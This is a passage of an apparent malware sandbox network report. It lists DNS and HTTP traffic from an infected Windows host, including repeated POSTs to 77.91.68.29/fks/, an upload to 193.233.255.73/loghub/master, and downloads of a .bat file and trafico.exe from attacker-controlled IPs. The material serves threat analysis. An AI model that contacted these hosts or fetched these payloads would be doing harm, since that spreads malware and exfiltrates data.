                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              X-FB-Debug: Qlm3AiY/x2tfFIiW9xGjJRKQhPTX/9SSx5SQxahN1CJVD6YECXIPZHt2aCkrf9Tipx5qEbuF8DZQdFBkbyA1QA==
                                                                                              Date: Tue, 24 Oct 2023 05:04:27 GMT
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 47657
                                                                                            • flag-us
                                                                                              DNS
                                                                                              accounts.youtube.com
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              accounts.youtube.com
                                                                                              IN A
                                                                                              Response
                                                                                              accounts.youtube.com
                                                                                              IN CNAME
                                                                                              www3.l.google.com
                                                                                              www3.l.google.com
                                                                                              IN A
                                                                                              142.250.179.206
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=29168969&timestamp=1698151585206
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.206:443
                                                                                              Request
                                                                                              GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=29168969&timestamp=1698151585206 HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyMxAAUkQcBgxT8oKYLaTpqquFKlgCf1BXOhgEJwGMa8ccXhJvx5CzR7HyNkABFHUWZTToLxQ&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-938975925%3A1698151584909921&theme=glif
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.youtube.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              X-Frame-Options: ALLOW-FROM https://accounts.google.com
                                                                                              Content-Security-Policy: frame-ancestors https://accounts.google.com
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-jOhAlv_uBwQDkYhx-kQK2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self'
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:27 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Content-Encoding: gzip
                                                                                              Server: ESF
                                                                                              X-XSS-Protection: 0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://njblkgtkhg.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 182
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:33 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 8
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://mswjn.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 142
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:33 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Keep-Alive: timeout=5, max=99
                                                                                              Connection: Keep-Alive
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://mkljj.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 255
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:33 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=98
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://ddsmddoa.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 303
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:33 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Keep-Alive: timeout=5, max=97
                                                                                              Connection: Keep-Alive
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://cwsfbotd.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 359
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:34 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=96
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://lglrpbhghg.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 172
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:34 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 42
                                                                                              Keep-Alive: timeout=5, max=95
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://rvvfcmo.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 227
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:35 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=94
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://hmgmt.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 352
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:35 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Keep-Alive: timeout=5, max=93
                                                                                              Connection: Keep-Alive
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://rjqfwc.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 353
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:35 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=92
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://dgprk.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 329
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:36 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Keep-Alive: timeout=5, max=91
                                                                                              Connection: Keep-Alive
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://pmpotkj.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 184
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:36 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=90
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://rpnyw.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 141
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:37 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Keep-Alive: timeout=5, max=89
                                                                                              Connection: Keep-Alive
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://auyamyp.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 116
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:37 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=88
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://snrxcgt.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 220
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:37 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 45
                                                                                              Keep-Alive: timeout=5, max=87
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://mgufjouw.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 316
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:39 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 403
                                                                                              Keep-Alive: timeout=5, max=86
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.68.29/fks/
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.29:80
                                                                                              Request
                                                                                              POST /fks/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://xuooqsx.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 223
                                                                                              Host: 77.91.68.29
                                                                                              Response
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 24 Oct 2023 12:46:39 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 41
                                                                                              Keep-Alive: timeout=5, max=85
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://193.233.255.73/loghub/master
                                                                                              F94E.exe
                                                                                              Remote address:
                                                                                              193.233.255.73:80
                                                                                              Request
                                                                                              POST /loghub/master HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=o1kewWWQfIEeJMhLzRme
                                                                                              Content-Length: 213
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
                                                                                              Host: 193.233.255.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Tue, 24 Oct 2023 12:46:35 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 8
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Referrer-Policy: same-origin
                                                                                            • flag-fi
                                                                                              GET
                                                                                              http://77.91.68.249/fuza/3.bat
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              77.91.68.249:80
                                                                                              Request
                                                                                              GET /fuza/3.bat HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: 77.91.68.249
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:46:34 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Wed, 11 Oct 2023 23:08:44 GMT
                                                                                              ETag: "4f-60778e7a46265"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 79
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-us
                                                                                              DNS
                                                                                              play.google.com
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              play.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              play.google.com
                                                                                              IN A
                                                                                              142.251.36.14
                                                                                            • flag-nl
                                                                                              POST
                                                                                              https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.251.36.14:443
                                                                                              Request
                                                                                              POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                              Accept: */*
                                                                                              X-Goog-AuthUser: 0
                                                                                              Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                                                              Referer: https://accounts.google.com/v3/signin/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: play.google.com
                                                                                              Content-Length: 863
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Set-Cookie: NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg; expires=Wed, 24-Apr-2024 12:46:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                              Access-Control-Allow-Origin: http://play.google.com
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Headers: X-Playlog-Web
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Encoding: gzip
                                                                                              Date: Tue, 24 Oct 2023 12:46:37 GMT
                                                                                              Server: Playlog
                                                                                              Cache-Control: private
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Expires: Tue, 24 Oct 2023 12:46:37 GMT
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              POST
                                                                                              https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.251.36.14:443
                                                                                              Request
                                                                                              POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                              Accept: */*
                                                                                              X-Goog-AuthUser: 0
                                                                                              Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                                                              Referer: https://accounts.google.com/v3/signin/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: play.google.com
                                                                                              Content-Length: 617
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Access-Control-Allow-Origin: http://play.google.com
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Headers: X-Playlog-Web
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Encoding: gzip
                                                                                              Date: Tue, 24 Oct 2023 12:46:57 GMT
                                                                                              Server: Playlog
                                                                                              Cache-Control: private
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              POST
                                                                                              https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.251.36.14:443
                                                                                              Request
                                                                                              POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                              Accept: */*
                                                                                              X-Goog-AuthUser: 0
                                                                                              Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                                                              Referer: https://accounts.google.com/v3/signin/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: play.google.com
                                                                                              Content-Length: 370
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Access-Control-Allow-Origin: http://play.google.com
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Access-Control-Allow-Credentials: true
                                                                                              Access-Control-Allow-Headers: X-Playlog-Web
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Encoding: gzip
                                                                                              Date: Tue, 24 Oct 2023 12:46:57 GMT
                                                                                              Server: Playlog
                                                                                              Cache-Control: private
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-tr
                                                                                              GET
                                                                                              http://185.216.70.222/trafico.exe
                                                                                              Explorer.EXE
                                                                                              Remote address:
                                                                                              185.216.70.222:80
                                                                                              Request
                                                                                              GET /trafico.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: 185.216.70.222
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:46:38 GMT
                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                              Last-Modified: Mon, 23 Oct 2023 07:21:51 GMT
                                                                                              ETag: "7c648-6085d1376844e"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 509512
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program
                                                                                            • flag-us
                                                                                              DNS
                                                                                              www.facebook.com
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              www.facebook.com
                                                                                              IN A
                                                                                              Response
                                                                                              www.facebook.com
                                                                                              IN CNAME
                                                                                              star-mini.c10r.facebook.com
                                                                                              star-mini.c10r.facebook.com
                                                                                              IN A
                                                                                              157.240.201.35
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://www.facebook.com/login
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.35:443
                                                                                              Request
                                                                                              GET /login HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: www.facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
                                                                                              report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
